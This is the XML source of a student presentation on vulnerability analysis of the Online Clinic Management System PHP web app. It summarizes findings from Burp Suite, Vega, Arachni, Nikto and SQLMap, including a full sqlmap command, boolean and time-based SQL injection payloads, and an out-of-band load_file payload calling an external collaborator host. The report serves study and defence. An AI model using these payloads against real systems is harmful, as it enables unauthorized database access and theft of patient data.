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5" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="268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3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0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897C-67BD-4881-9148-3CF2EE8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INSE 6140 Presentation on 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521-C218-4887-8247-90FC408D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Team Members</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA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C8ED4-49B4-4F5C-B516-788B8C7D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14339"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1954634" y="3044930"/>
          <a:ext cx="378343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9658">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1111459119"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1263778">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3289933081"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="353937">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" b="0" dirty="0"/>
                        <a:t>Arafat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40102708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05946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Samer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1"/>
                        <a:t>Zerez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40099650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8572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Yassine Khalifa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26950957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1558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D11173-FE8F-4A08-B486-58B804B07CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1887523" y="4672562"/>
            <a:ext cx="35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Presented to - Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Makan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Pourzandi</a:t>
            </a:r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0AF50-4E69-4A94-AFA2-0B26C949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2" y="1802183"/>
            <a:ext cx="4897952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NIKto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> report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4AC102-452C-4C03-89A0-11A302F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9" y="1076736"/>
            <a:ext cx="11533061" cy="5507037"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41932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SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>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219B-F14B-4E42-8E67-2D428C99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7" y="1620407"/>
            <a:ext cx="4068996" cy="4732670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> -u 192.168.0.61/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>ocms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>index.php?signIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=1 -crawl=3 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>dbms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> --cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>online_clinic_management_system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=hl6aaf2t1hc2i6runicnmscrmn --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>dbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> --data="user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>admin&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=admin" --level=5 --risk=3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Scan Started at 22:08 16-04-2020 EST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Scan Ended at 10:32 17-04-2020 EST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Total Time - 12 hours 24 mins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DC778-9854-4857-8EDC-891BF6B8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10377" r="-295" b="-10377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4265635" y="1143466"/>
            <a:ext cx="7729728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4EC-8DE9-4469-B312-ECA0F011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4633"/>
            <a:ext cx="7729728" cy="1188720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sqli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284C-5FD5-425F-AE55-DABA4DBE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177A-BE57-48A6-B01B-892FF5DD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Thank You !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6703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05CA-2433-498B-BAE8-815C065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Vulnerability Analysis of an open-source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CB6B-7603-4FEE-81C8-0E6E909D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781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(Online Clinic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420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094A-8790-4D6C-9AE8-0DB08328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71745"/>
            <a:ext cx="7930728" cy="1283558"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Online Clinic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4471-C1EA-40D3-B247-ADB43E6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38044"/>
            <a:ext cx="8132064" cy="3586587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OCMS is a web application to manage your clinic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>License </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> MIT License</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Requires PHP and MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Latest version: OCMS version 2.21, released on June 12, 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>generated using AppGini 5.62 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3871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58CA-5A5F-4326-A227-6806389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72F-443B-4430-B4EF-193F1578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005" y="83976"/>
            <a:ext cx="6083558" cy="6774024"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Burp Suite Professional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>OWASP ZAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Arachni</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Wapiti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>VCG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Vega Vulnerability Scanner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Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> Repository of the project: https://github.com/ar4f4t/INSE-6140-Project </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10421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9A6B-D570-435D-8062-E4A47A72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8202"/>
            <a:ext cx="7729728" cy="1188720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visual Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Grepper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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44AD0ED-5CA9-447F-BC15-7FA5458FD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7" t="1495" r="829"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8250339" y="1924777"/>
            <a:ext cx="3613183" cy="4303551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F32D43F-787B-4E05-994D-A392E64B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2373" b="70770"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="242595" y="4916838"/>
            <a:ext cx="7814797" cy="1745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2A02C-E763-4E02-B8E0-7EF9D3E7EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023457" y="2315362"/>
            <a:ext cx="558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SQL Injection from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at Line 110</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88898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B93-F714-4E58-8C45-27F33B5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52"/>
            <a:ext cx="7729728" cy="649504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Vega Report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FFBE2A-804C-4B54-BE93-7D82BBD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16" y="849086"/>
            <a:ext cx="7186488" cy="592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6A76-D97B-44AB-A427-EB78D2D542F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412381" y="1248333"/>
            <a:ext cx="44530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endParaRPr lang="en-CA" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authenticated Automatic Scan</a:t>
            </a:r>
          </a:p>
          <a:p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404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET Request  from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patient_prescription.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘search=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’”’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output Result 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 SQL syntax error message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p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2. Same output results for </a:t>
            </a:r>
          </a:p>
          <a:p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patient_diagnosis.php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 and </a:t>
            </a:r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patient_history.php</a:t>
            </a:r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CC6-1D30-417E-879C-A91EA52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263763"/>
            <a:ext cx="7729728" cy="646850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Burp suite Report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6CC-8548-46EC-ADC8-DC8A8D60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157681"/>
            <a:ext cx="11450972" cy="529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/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pageViewMembers.php?searchMembers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=145817&amp;groupID=0&amp;status=138707587%20or%209037%3d09037&amp;searchField=0&amp;page=1 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GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error Message: payload 38707587 or 9037=09037</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA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/hooks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patient_prescription.php?search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=90191398963262'%20or%208004%3d8004--%20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98963262' or 8004=8004—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr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patient_diagnosis.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [Method 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Code Injection: '+(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('\\\\c0df40ldznkv8kfgxp3j0k0spjvcj4as1vpncd02.burpcollaborator.net\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'))+’ interacted with an external domain [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS lookup of type A -IP address 24.201.141.186]</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
            </a:endParaRP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22601788' or 2388=2388--</a:t>
            </a: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98C9-7E82-4EE2-9B52-16F4658A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335518"/>
            <a:ext cx="7729728" cy="1188720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Burp suite Report Analysis (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Cont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40CC-FB2A-4798-84FA-FE3966B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5" y="1862357"/>
            <a:ext cx="8887073" cy="402028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patient_history.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  [Method: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payload 95747182' or 7702=7702—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Time Delay: payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+(select*from(select(sleep(20)))a)+’ caused 20705ms response to the request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA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404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability classifications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL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CWE-94: Improper Control of Generation of Code ('Code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CWE-116: Improper Encoding or Escaping of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118"/>
            <a:ext cx="7729728" cy="64199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Arachni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2AA0-010D-4BCE-A2EB-63252EF5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6" y="949203"/>
            <a:ext cx="11699468" cy="5507580"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>CLI command : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>arachni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> http://www.arafat.com/ocms --http-authentication-type basic --http-authentication-username admin --http-authentication-password admin --report-save-path=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>arafat.com.afr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161B-7D05-43EA-BF1F-F83B377F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7" y="1747856"/>
            <a:ext cx="9682081" cy="4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71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INSE 6140 Presentation on vulnerability analysis</vt:lpstr>
      <vt:lpstr>Vulnerability Analysis of an open-source Web Application</vt:lpstr>
      <vt:lpstr>Online Clinic Management System</vt:lpstr>
      <vt:lpstr>Analysis Tools</vt:lpstr>
      <vt:lpstr>Visual Code Grepper</vt:lpstr>
      <vt:lpstr>Vega Report Analysis</vt:lpstr>
      <vt:lpstr>Burp suite Report Analysis</vt:lpstr>
      <vt:lpstr>Burp suite Report Analysis (Cont)</vt:lpstr>
      <vt:lpstr>Arachni report</vt:lpstr>
      <vt:lpstr>NIKto report</vt:lpstr>
      <vt:lpstr>SQLMap report</vt:lpstr>
      <vt:lpstr>Sqli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6140 Presentation on vulnerability analysis</dc:title>
  <dc:creator>Arafat Ali</dc:creator>
  <cp:lastModifiedBy>Yassine Khalifa</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-17T05:54:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-17T21:29:25Z</dcterms:modified>
</cp:coreProperties>
</file>